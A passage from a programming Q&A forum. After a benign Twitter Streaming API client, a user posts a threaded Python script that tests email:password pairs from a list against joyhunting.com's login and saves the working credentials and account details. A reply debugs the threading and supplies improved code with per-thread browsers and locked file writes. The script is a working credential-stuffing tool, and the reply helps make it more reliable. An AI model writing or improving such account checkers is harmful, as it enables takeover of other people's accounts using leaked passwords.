'track': 'iphone,ipad,ipod'}
class TwitterStream:
def __init__(self, timeout=False):
self.oauth_token = oauth.Token(key=OAUTH_KEYS['access_token_key'], secret=OAUTH_KEYS['access_token_secret'])
self.oauth_consumer = oauth.Consumer(key=OAUTH_KEYS['consumer_key'], secret=OAUTH_KEYS['consumer_secret'])
self.conn = None
self.buffer = ''
self.timeout = timeout
self.setup_connection()
def setup_connection(self):
""" Create persistant HTTP connection to Streaming API endpoint using cURL.
"""
if self.conn:
self.conn.close()
self.buffer = ''
self.conn = pycurl.Curl()
# Restart connection if less than 1 byte/s is received during "timeout" seconds
if isinstance(self.timeout, int):
self.conn.setopt(pycurl.LOW_SPEED_LIMIT, 1)
self.conn.setopt(pycurl.LOW_SPEED_TIME, self.timeout)
self.conn.setopt(pycurl.URL, API_ENDPOINT_URL)
self.conn.setopt(pycurl.USERAGENT, USER_AGENT)
# Using gzip is optional but saves us bandwidth.
self.conn.setopt(pycurl.ENCODING, 'deflate, gzip')
self.conn.setopt(pycurl.POST, 1)
self.conn.setopt(pycurl.POSTFIELDS, urllib.urlencode(POST_PARAMS))
self.conn.setopt(pycurl.HTTPHEADER, ['Host: stream.twitter.com',
'Authorization: %s' % self.get_oauth_header()])
# self.handle_tweet is the method that is called when new tweets arrive
self.conn.setopt(pycurl.WRITEFUNCTION, self.handle_tweet)
def get_oauth_header(self):
""" Create and return OAuth header.
"""
params = {'oauth_version': '1.0',
'oauth_nonce': oauth.generate_nonce(),
'oauth_timestamp': int(time.time())}
req = oauth.Request(method='POST', parameters=params, url='%s?%s' % (API_ENDPOINT_URL,
urllib.urlencode(POST_PARAMS)))
req.sign_request(oauth.SignatureMethod_HMAC_SHA1(), self.oauth_consumer, self.oauth_token)
return req.to_header()['Authorization'].encode('utf-8')
def start(self):
""" Start listening to Streaming endpoint.
Handle exceptions according to Twitter's recommendations.
"""
backoff_network_error = 0.25
backoff_http_error = 5
backoff_rate_limit = 60
while True:
self.setup_connection()
try:
self.conn.perform()
except:
# Network error, use linear back off up to 16 seconds
print 'Network error: %s' % self.conn.errstr()
print 'Waiting %s seconds before trying again' % backoff_network_error
time.sleep(backoff_network_error)
backoff_network_error = min(backoff_network_error + 1, 16)
continue
# HTTP Error
sc = self.conn.getinfo(pycurl.HTTP_CODE)
if sc == 420:
# Rate limit, use exponential back off starting with 1 minute and double each attempt
print 'Rate limit, waiting %s seconds' % backoff_rate_limit
time.sleep(backoff_rate_limit)
backoff_rate_limit *= 2
else:
# HTTP error, use exponential back off up to 320 seconds
print 'HTTP error %s, %s' % (sc, self.conn.errstr())
print 'Waiting %s seconds' % backoff_http_error
time.sleep(backoff_http_error)
backoff_http_error = min(backoff_http_error * 2, 320)
def handle_tweet(self, data):
""" This method is called when data is received through Streaming endpoint.
"""
self.buffer += data
if data.endswith('\r\n') and self.buffer.strip():
# complete message received
message = json.loads(self.buffer)
self.buffer = ''
msg = ''
if message.get('limit'):
print 'Rate limiting caused us to miss %s tweets' % (message['limit'].get('track'))
elif message.get('disconnect'):
raise Exception('Got disconnect: %s' % message['disconnect'].get('reason'))
elif message.get('warning'):
print 'Got warning: %s' % message['warning'].get('message')
else:
print 'Got tweet with text: %s' % message.get('text')
if __name__ == '__main__':
ts = TwitterStream()
ts.setup_connection()
ts.start()
Please help me resolve the issue with this code.

python thread queue question

Hello all.
I made a Python script with threads that checks whether some accounts exist on a website.
If I run 1 thread it works well, but if I increase the threads to around 3~5 or more, the results are very different compared to 1 thread. I checked manually, and with more threads the results are not correct.
I think some of my thread code needs tuning, or should I use the Queue module?
Can anyone advise on or tune my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time
# Maximum number of process to spawn at any one given time.
MAX_PROCS =5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'
# Threading class
class CheckMyThread ( threading.Thread ):
llemail = ""
llpassword = ""
def __init__ ( self , lemail, lpassword):
self.llemail = lemail
self.llpassword = lpassword
threading.Thread.__init__( self )
pass
def run ( self ):
valid = []
llemail = self.llemail
llpassword = self.llpassword
try:
params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
rs = mechanize.urlopen(rq)
data = rs.read()
logged_in = r'var _id' in data # successful login
if logged_in :
rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
rs = mechanize.urlopen(rq)
maindata = rs.read(50024)
jun_member = r"준회원" # "associate member"; kept in Korean since it must match the page text
save = open(SAVEFILE, 'a')
for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
matched = match.group(1)
for match2 in re.finditer(r"var _gd(.*?);", data):
matched2 = match2.group(1)
print '%s, %s' %(matched, matched2)
break
rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
rs1=mechanize.urlopen(rq1)
sendmsg= rs1.read()
#print sendmsg
match3 = ''
for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
matched3 = match3.group(1)
#print matched3
print 'bad'
break
if match3 =='':
save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
save.close()
print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
else:
print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
return 0
except:
print '[!] Exception checking %s.' % (llemail)
return 1
return 0
try:
listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
print '[!] %s does not exist. Please create the file!' % (maillist)
exit (2)
#Loop through the file
for currline, line in enumerate(listhandle, 1):
#Parse the line
try:
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
#Throw an error and exit.
except:
print '[!] Parse Error in %s on line %d.' % (maillist, currline)
exit(2)
#Run a while statement:
if len(threads) < MAX_PROCS:
#Fork out into another process
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
else:
#Wait for a thread to exit.
gonext = 0
while 1 == 1:
i = 0
#print '[ ] Checking for a thread to exit...'
while i < len(threads):
#print '[ ] %d' % (i)
try:
if threads[i]:
if not threads[i].isAlive():
#print '[-] Thread %d is dead' % (i)
threads.pop(i)
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
gonext = 1
break
else:
#print '[+] Thread %d is still running' % (i)
pass
else:
print '[ ] Crap.';
except NameError:
print '[ ] AWWW COME ON!!!!'
i = i + 1
time.sleep(0.050);
if gonext:
break
Can you please specify how the results differ?
From what I see, the code is doing much more than verifying an account.
You're also appending to a single file from multiple threads; I'd say that's not thread-safe.
Also, AFAIK mechanize uses shared cookie storage for all module-level requests, so the threads are probably interfering with each other. Use a separate mechanize.Browser() inside run() instead of mechanize.Request().
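A rough sketch of both suggestions, reusing the login URL from the question (illustrative only; the page-parsing logic is omitted):
import threading
import urllib
import mechanize
SAVEFILE = 'valid_joyhunt.txt'
save_lock = threading.Lock()
class CheckMyThread(threading.Thread):
    def __init__(self, email, password):
        threading.Thread.__init__(self)
        self.email = email
        self.password = password
    def run(self):
        # A separate Browser per thread: its own cookie jar, no shared module state.
        br = mechanize.Browser()
        params = urllib.urlencode({'userid': self.email, 'passwd': self.password})
        data = br.open('http://www.joyhunting.com/include/member/login_ok1.asp', params).read()
        if 'var _id' in data:
            # Serialize writes so lines from different threads don't interleave.
            with save_lock:
                with open(SAVEFILE, 'a') as f:
                    f.write('%s:%s\n' % (self.email, self.password))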
